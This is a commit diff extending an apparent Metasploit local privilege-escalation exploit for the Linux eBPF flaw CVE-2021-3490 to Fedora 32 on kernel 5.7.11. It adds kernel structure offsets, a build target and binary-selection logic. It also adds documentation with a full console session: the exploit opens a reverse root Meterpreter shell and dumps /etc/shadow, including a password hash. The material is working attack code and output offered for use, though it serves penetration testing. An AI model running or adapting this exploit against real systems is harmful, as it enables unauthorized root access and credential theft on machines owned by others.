Add in support for Fedora 32 running kernel 5.7.11-200

documentation/modules/exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe.md

@@ -391,4 +391,173 @@ Active sessions
                                    @ 192.168.224.222                              (192.168.224.222)
 
 msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) >
+```
+
+### Fedora 32 with Linux Kernel 5.7.11-200
+```
+msf6 > use multi/handler
+[*] Using configured payload generic/shell_reverse_tcp
+msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/bind_tcp
+payload => linux/x64/meterpreter/bind_tcp
+msf6 exploit(multi/handler) > show options
+
+Module options (exploit/multi/handler):
+
+   Name  Current Setting  Required  Description
+   ----  ---------------  --------  -----------
+
+
+Payload options (linux/x64/meterpreter/bind_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LPORT  4444             yes       The listen port
+   RHOST                   no        The target address
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Wildcard Target
+
+
+msf6 exploit(multi/handler) > set RHOST 192.168.224.223
+RHOST => 192.168.224.223
+msf6 exploit(multi/handler) > exploit
+
+[*] Started bind TCP handler against 192.168.224.223:4444
+[*] Sending stage (3012548 bytes) to 192.168.224.223
+[*] Meterpreter session 1 opened (192.168.224.128:41579 -> 192.168.224.223:4444) at 2021-08-20 13:29:30 -0500
+
+meterpreter > sysinfo
+Computer     : localhost.localdomain
+OS           : Fedora 32 (Linux 5.7.11-200.fc32.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: test @ localhost.localdomain (uid=1000, gid=1000, euid=1000, egid=1000)
+meterpreter > shell
+Process 2100 created.
+Channel 1 created.
+cat /etc/shadow
+cat: /etc/shadow: Permission denied
+^Z
+Background channel 1? [y/N]  y
+meterpreter > background
+[*] Backgrounding session 1...
+msf6 exploit(multi/handler) > use exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > show options
+
+Module options (exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   yes       The session to run this module on.
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.224.128  yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Auto
+
+
+msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > set SESSION 1
+SESSION => 1
+msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > check
+[*] The target appears to be vulnerable.
+msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > exploit
+
+[*] Started reverse TCP handler on 192.168.224.128:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Writing '/tmp/.VBiCx' (39352 bytes) ...
+[*] Writing '/tmp/.KqjrGX5' (250 bytes) ...
+[*] Launching exploit ...
+[*] Sending stage (3012548 bytes) to 192.168.224.223
+[+] Deleted /tmp/.VBiCx
+[+] Deleted /tmp/.KqjrGX5
+[*] Meterpreter session 2 opened (192.168.224.128:4444 -> 192.168.224.223:54884) at 2021-08-20 13:33:38 -0500
+^C[-] Exploit failed [user-interrupt]: Interrupt
+[-] exploit: Interrupted
+msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                   Information                                    Connection
+  --  ----  ----                   -----------                                    ----------
+  1         meterpreter x64/linux  test @ localhost.localdomain (uid=1000, gid=1  192.168.224.128:41579 -> 192.168.224.223:4444
+                                   000, euid=1000, egid=1000) @ loc...            (192.168.224.223)
+  2         meterpreter x64/linux  root @ localhost.localdomain (uid=0, gid=0, e  192.168.224.128:4444 -> 192.168.224.223:54884
+                                   uid=0, egid=0) @ localhost.local...            (192.168.224.223)
+
+msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > sessions -i 2
+[*] Starting interaction with 2...
+
+meterpreter > getuid
+Server username: root @ localhost.localdomain (uid=0, gid=0, euid=0, egid=0)
+meterpreter > shell
+Process 2148 created.
+Channel 1 created.
+cat /etc/shadow
+root:!::0:99999:7:::
+bin:*:18292:0:99999:7:::
+daemon:*:18292:0:99999:7:::
+adm:*:18292:0:99999:7:::
+lp:*:18292:0:99999:7:::
+sync:*:18292:0:99999:7:::
+shutdown:*:18292:0:99999:7:::
+halt:*:18292:0:99999:7:::
+mail:*:18292:0:99999:7:::
+operator:*:18292:0:99999:7:::
+games:*:18292:0:99999:7:::
+ftp:*:18292:0:99999:7:::
+nobody:*:18292:0:99999:7:::
+systemd-coredump:!!:18374::::::
+systemd-network:!!:18374::::::
+systemd-resolve:!!:18374::::::
+dbus:!!:18374::::::
+tss:!!:18374::::::
+qemu:!!:18374::::::
+gluster:!!:18374::::::
+polkitd:!!:18374::::::
+rtkit:!!:18374::::::
+pulse:!!:18374::::::
+systemd-timesync:!!:18374::::::
+avahi:!!:18374::::::
+pipewire:!!:18374::::::
+chrony:!!:18374::::::
+unbound:!!:18374::::::
+usbmuxd:!!:18374::::::
+dnsmasq:!!:18374::::::
+geoclue:!!:18374::::::
+saslauth:!!:18374::::::
+radvd:!!:18374::::::
+rpc:!!:18374:0:99999:7:::
+apache:!!:18374::::::
+colord:!!:18374::::::
+rpcuser:!!:18374::::::
+openvpn:!!:18374::::::
+nm-openvpn:!!:18374::::::
+abrt:!!:18374::::::
+nm-openconnect:!!:18374::::::
+flatpak:!!:18374::::::
+gdm:!!:18374::::::
+gnome-initial-setup:!!:18374::::::
+sshd:!!:18374::::::
+vboxadd:!!:18374::::::
+tcpdump:!!:18374::::::
+test:$6$qUS1ahlM0hqfNoyO$TZO8sUu1btvp4XRhqjy4Cetjm1LZ3DOWZDqfx8OPfB4QXjmiK5EPQmBW.TT0CJpSQBsanT0u9xokn1NtGepas/:18859:0:99999:7:::
 ```

external/source/exploits/CVE-2021-3490/Linux_LPE_eBPF_CVE-2021-3490/Makefile

@@ -6,11 +6,14 @@ INC = include/
 
 CMP = -o $(BIN)exploit.bin -I $(INC) exploit.c bpf.c kmem_search.c
 
-groovy: 
+groovy:
 	$(CC) -DGROOVY $(CMP)
 
-hirsute: 
+hirsute:
 	$(CC) -DHIRSUTE $(CMP)
 
+kernel_5_7:
+	$(CC) -DKERNEL_5_7 $(CMP)
+
 clean:
 	rm $(BIN)exploit.bin

external/source/exploits/CVE-2021-3490/Linux_LPE_eBPF_CVE-2021-3490/include/kernel_defs.h

@@ -34,6 +34,9 @@
 #ifdef HIRSUTE
 #define TASK_LIST_OFFSET  0x578
 #endif
+#ifdef KERNEL_5_7
+#define TASK_LIST_OFFSET 0x920
+#endif
 // Offset of cred pointer in task_struct
 #ifdef GROOVY
 #define TASK_CRED_OFFSET  0xA88
@@ -41,6 +44,9 @@
 #ifdef HIRSUTE
 #define TASK_CRED_OFFSET  0x6C8
 #endif
+#ifdef KERNEL_5_7
+#define TASK_CRED_OFFSET 0xA90
+#endif
 
 // Offset of uid field in cred structure
 #define CRED_UID_OFFSET  0x4
@@ -150,7 +156,7 @@ struct idr
 
 struct pid_namespace
 {
-#ifdef GROOVY
+#if defined(GROOVY) || defined(KERNEL_5_7)
     uint64_t kref; /* From Linux kernel 5.11 this field was removed, however it is present in all previous versions.
                     See https://elixir.bootlin.com/linux/v5.11-rc1/source/include/linux/pid_namespace.h and
                     https://elixir.bootlin.com/linux/v5.10.60/source/include/linux/pid_namespace.h for a comparison */
@@ -159,4 +165,4 @@ struct pid_namespace
 };
 
 
-#endif
+#endif

modules/exploits/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe.rb

@@ -71,7 +71,7 @@ class MetasploitModule < Msf::Exploit::Local
     )
     register_advanced_options([
       OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
-      OptInt.new('CmdTimeout', [true, 'Maximum number of seconds to wait for the exploit to complete', 90])
+      OptInt.new('CmdTimeout', [true, 'Maximum number of seconds to wait for the exploit to complete', 200])
     ])
   end
 
@@ -106,8 +106,19 @@ class MetasploitModule < Msf::Exploit::Local
       elsif (Rex::Version.new(major_version) != Rex::Version.new('5.8.0')) && (Rex::Version.new(major_version) != Rex::Version.new('5.11.0'))
         return CheckCode::Unknown('Unknown target kernel version, recommend manually checking if target kernel is vulnerable.')
       end
+    elsif release =~ /\.fc32\./
+      version_array = release.split('-')
+      major_version = version_array[0]
+      minor_version = version_array[1].split('.')[0]
+      if Rex::Version.new(major_version) >= Rex::Version.new('5.11.20')
+        return CheckCode::Safe("Target Fedora kernel version is #{major_version}-#{minor_version} which is not vulnerable!")
+      elsif Rex::Version.new(major_version) == Rex::Version.new('5.11.20') && Rex::Version.new(minor_version) >= Rex::Version.new('300')
+        return CheckCode::Safe("Target Fedora system is running a 5.11.20 kernel however it has been patched!")
+      elsif Rex::Version.new(major_version) <= Rex::Version.new('5.7')
+        return CheckCode::Safe("Running a Fedora system with a kernel before kernel version 5.7 where the vulnerability was introduced")
+      end
     else
-      return CheckCode::Unknown("Target is not a Ubuntu target, so we can't check if the target is vulnerable or not!")
+      return CheckCode::Unknown("Target is not a known target, so we can't check if the target is vulnerable or not!")
     end
 
     vprint_good("Kernel version #{release} appears to be vulnerable")
@@ -143,6 +154,8 @@ class MetasploitModule < Msf::Exploit::Local
     major_version = release.split('-')[0]
     if (Rex::Version.new(major_version) == Rex::Version.new('5.11.0'))
       upload_and_chmodx(executable_path, exploit_data('cve-2021-3490', 'hirsute.bin'))
+    elsif release =~ /\.fc32\./ && major_version =~ /5\.7/
+      upload_and_chmodx(executable_path, exploit_data('cve-2021-3490', 'fedora-5-7.bin'))
     else
       upload_and_chmodx(executable_path, exploit_data('cve-2021-3490', 'groovy.bin'))
     end